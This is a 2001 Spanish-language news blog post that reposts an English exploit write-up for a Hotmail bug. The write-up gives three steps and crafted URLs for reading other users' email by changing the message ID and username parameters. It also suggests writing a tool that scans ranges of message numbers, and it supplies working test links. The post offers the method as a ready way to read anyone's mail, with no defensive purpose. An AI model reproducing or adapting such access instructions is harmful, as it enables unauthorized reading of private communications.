Todas las cuentas de Hotmail visibles por cualquiera!

Escrito el 21 agosto, 2001 – 10:21 | por storm | 4.179 lecturas

Ay Microsoft, de la mano de la empresa que creo el “login universal” nos llega un nuevo bug por el cual cualquier ususario de Hotmail puede ver los mensajes de cualquier otro usuario. Un exploit simple pero terrible, no sabemos si ya lo habran reparado para el momento en que publiquemos la noticia pero a continuacion van los detalles de como ver el mail de cualquiera! (sigue….)
—=[ Three Steps To View Someones Emails In Hotmail ]=—

(Tested with Internet Explorer 5)

To view full email from some elses account do the following:

1. Login normally to Hotmail with your ID (any id)

2. Use this type of link to view specific message from specific user:

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http\%3a\%2f\%2f64\%2e4\%2e36\%2e250\%2fcgi\%2dbin\%2fgetmsg&hm___qs=\%26msg\%3dMSG998047250\%2e22\%26start\%3d9702\%26len\%3d9687\%26raw\%3d0\%26disk\%3d64\%2e4\%2e36\%2e68_d1577\%26login\%3dusername\%26domain\%3dhotmail\%2ecom&hm___fl=attrd&domain=hotmail.com
or
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http\%3a\%2f\%2f64\%2e4\%2e36\%2e250\%2fcgi\%2dbin\%2fgetmsg&hm___qs=\%26msg\%3dMSG998047250\%2e22\%26start\%3d9702\%26len\%3d9687\%26raw\%3d0\%26disk\%3d64\%2e4\%2e36\%2e68_d1577\%26login\%3dusername\%26domain\%3dhotmail\%2ecom&hm___fl=attrd&domain=hotmail.com

From that link change values:
MSG943322803\%2e16 (Message id number, its simply a counter. \%2e=.)
username (Hotmail account name to view)

(remove “\%26raw\%3d0” if you want to view email as ‘emailbox view’, instead of full raw view.)
(remove “&hm___fl=attrd&domain=hotmail.com” if you dont like the hotmail frame on top.)

3. Done. If you entered correct message number & that user has it you will see it. 🙂
(Test it with your own other hotmail account messages first to get the idea working.)

—=[ ideas and comments for improved viewing / scan ]—

Now typing those message numbers manually is too much
work, you could create a small utility to automatically
scan given range of messages from specific user name.
(You need to build it to work with IE, as you must be
logged in hotmail when you want to view messages..)

It also helps to know that from the message numbers,
in you own hotmail inbox,you can see about what time
is what message number been used. eg:

MSG997936971.27 arrived on 16.08.2001.
MSG996698372.27 arrived on 01.08.2001.
MSG975960863.0 arrived on 04.12.2000.

So you dont need to scan as many message addresses
when you know from which range you are looking at.

(Check out Hotmail Scanner Bot aka. hobo for automatic scanning.)

Test messages: (Login to hotmail,then use links to view message from my test account)

raw format view: (can copy base64 encoded files too:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http\%3a\%2f\%2f64\%2e4\%2e36\%2e250\%2fcgi\%2dbin\%2fgetmsg&hm___qs=\%26msg\%3dMSG998047250\%2e22\%26start\%3d1\%26len\%3d99999999999\%26raw\%3d0\%26login\%3djokutesti99\%26domain\%3dhotmail\%2ecom

email box view: (can see any attached images directly etc.:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http\%3a\%2f\%2f64\%2e4\%2e36\%2e250\%2fcgi\%2dbin\%2fgetmsg&hm___qs=\%26msg\%3dMSG998047250\%2e22\%26start\%3d1\%26len\%3d99999999999\%26login\%3djokutesti99\%26domain\%3dhotmail\%2ecom

—=[………… Research by wAwAsAn4 …………..]=—
—=[……….. wAwAsAn4@root-core.com ………….]=—
—=[…………….. 17.08.2001 ……………….]=—

You must be logged in to post a comment.

Buscar: